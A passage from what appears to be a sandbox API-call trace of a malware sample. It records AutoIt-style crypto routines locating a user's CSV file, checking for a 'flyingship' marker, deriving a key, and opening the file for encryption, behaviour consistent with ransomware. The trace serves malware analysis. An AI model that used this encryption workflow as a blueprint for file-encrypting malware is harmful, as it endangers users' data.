lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0172.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.470] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0172.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.471] CloseHandle (hObject=0x138) returned 1 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.472] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.473] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0172.473] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.473] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0172.473] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.473] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0172.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.474] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x363ae3c0, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 0x90add8 [0172.475] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x363ae3c0, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 0x90add8 [0172.476] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mo9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b RC5.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.479] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0172.479] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.479] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x363ae3c0, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 0x90ae18 [0172.479] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.479] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.479] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0172.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0172.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.480] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0172.482] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0172.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.482] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0172.483] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.483] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.483] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.483] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.483] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0172.483] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0172.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.498] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0172.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.498] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.499] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0172.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.499] CryptDestroyHash (hHash=0x90af58) returned 1 [0172.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\mo9b rc5.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.500] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.500] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0172.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.501] HeapFree 